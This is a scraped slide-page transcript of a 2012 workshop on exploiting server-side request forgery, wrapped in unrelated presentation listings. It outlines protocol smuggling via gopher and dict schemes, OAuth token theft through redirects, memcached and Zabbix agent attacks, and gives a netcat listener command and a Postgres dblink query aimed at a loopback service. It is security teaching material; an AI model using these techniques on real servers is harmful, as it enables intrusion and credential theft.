Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 

Recently uploaded (20)

Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embedding
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdf
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 

SSRF workshop

  • 1. SSRF exploitation. Workshop Special for DefCon-UA 08/12/2012 Moscow, Neuron Hackspace
  • 2. SSRF - Server Side Request Forgery ● The ability to create requests from the vulnerable server to intra/internet ● Using a protocol supported by available URI schemas, you can communicate with services running on other protocols (smuggling)
  • 3. SSRF - Server Side Request Forgery ● What i can do with forged requests? ● Anything! ○ Get data from internal network! ○ Exploit all host-based auth! ○ Exploit local services at loopback interface! ○ etc...
  • 4. SSRF - Server Side Request Forgery Forged Access to request loopback interface Access to internal network HTTP HTTP API request request request Frontend Firewall Backend Forged request Intranet
  • 5. SSRF - reasons ● SSRF not a vulnerability ● SSRF is class of attacks ● XXE,RFI,CRLF injection and others is SSRF's friends ● Anything that can open socket can be SSRFed
  • 6. SSRF - reasons ● Direct writing to sockets in webapp ● HTTP clients (libcurl, LWP, Java:URL, etc) ● Databases functions ● Format processing ○ XML parsers (XXE, DTD, XSD, XSLT, etc) ○ OpenOffice (DDE, dynamic data, etc) ○ PDF (tcpdf library, etc)
  • 7. SSRF - what stuff needed? ● Desire ● Luck ● Ability to anticipate and assume ● nc (nc -l -vv -p 12345 ) ● SSRF cheatsheet doc
  • 8. SSRF - cheatsheet ● We collected all related information about SSRF and their exploitation in one cheatsheet: https://docs.google. com/document/d/1v1TkWZtrhzRLy0bYXBcdL UedXGb9njTNIJXa3u9akHM/edit
  • 9. HTTP clients bugs Bypass webapp filters i.e. preg_replace using redirect ● any host -> localhost ● valid port -> any port ● valid schema -> any schema ● SOP for browsers, not for HTTPClients
  • 10. CASE #1. Market & Payment system. OAuth token hijacking ● Application received OAuth token from payment server ● Token added to HTTP request created by libcurl CURLOPT_HTTPHEADER ● This header will be append to all requests sended by libcurl. Even after redirects ;)
  • 11. CASE #1. Market & Payment system. OAuth token hijacking ● Find a open redirect vuln (WASC-38) at payment server ● Change payment url to call redirect instead of valid payment transaction ● Jack a OAuth token from market to payment system ;) https://dev.onsec.ru/workshop/market/
  • 12. CASE #1. Market & Payment system. OAuth token hijacking Open SSRF redirect attack vuln HTTP request HTTP with request Payment OAuth Market system token OAuth token from market HTTP request with OAuth token Evil host
  • 13. Let's go to server-side exploitations ● SSRF really cool for exploit host-based auth ● Host based auth must die ;) ● NoSQL databases, monitoring services and much more provide privileges to loopback connections by default
  • 14. Protocol smuggling ● When you say "GET / HTTP/1.1", what hears a service? ● When you receive data by one of prehistoric protocols what TCP packet you send? ● When you say "bla[valid packet]bla", what hears a service?
  • 15. Protocols and URI schemas in HTTP clients ● gopher:// provide you to create almost any TCP packet (no 0x00 for cURL, no bytes greater than 0x7f for Java) ● dict:// provide you to forge second line in plaint/text request (cURL only) ● ldap:// provide you to forge request with constant prefix (LWP only)
  • 16. What things do smuggling possible? ● HTTP clients don't check a protocol but send data immediately after connect (ldap for LWP) ● Services do not close socket after receive invalid packet ● Protocol that you can forge fits within the protocols that you want to exploit
  • 17. CASE #2. Wordpress exploitation ● Yes, it is latest wordpress (3.4.2) without any plugins ● Reason - libcurl unsafe redirect ● But SSRF can be triggered only from admin panel ● Use old our friend CSRF! ● CSRF + SSRF make you happy ;)
  • 18. CASE #2. Wordpress exploitation ● No gopher:// protocol in Debian squeeze for cURL ● But dict:// available and provide us to exploit memcached ● CSRF + SSRF = memcached exploit ;) https://dev.onsec.ru/workshop/wordpress/
  • 19. Format processors are SSRF friends ● 23/03/2012 in Kyiv I told about XXE based SSRF ● XML parsers, DTD, XSD, XSLT - all of them provide SSRF ● OpenOffice provide SSRF ● Many processing libraries provide SSRF ● Anything that can open socket can be SSRFed
  • 20. CASE #3. TCPDF library SSRF ● http://www.tcpdf.org/ ● Very common library for PDF conversion ● Example application convert users HTML to PDF ● What about external resources such as images? ● TCPDF using cURL https://dev.onsec.ru/workshop/pdfconv/
  • 21. CASE #4. LWP avatars uploader ● LWP - libwww Perl ● Usefully and common library ● Provide unsafe redirect ;) ● Support gopher protocol by default ;) ● Lets go!!!
  • 22. CASE #4. LWP avatars uploader Zabbix agentd explotation ● Zabbix is common monitoring system ● Zabbix agentd - local daemon for various check ● Host-based auth ;) ● Support command execution ;) https://dev.onsec.ru/workshop/avatars/
  • 23. CASE #5. Have a free time? ● Let's go Postgres explotation ● dblink() function provide us to do SSRF through SQLi http://www.postgresql.org/docs/8. 4/static/dblink.html SELECT dblink_send_query('host=127.0.0.1 dbname=quit user='nstatsn' port=11211 sslmode=disable','select 1');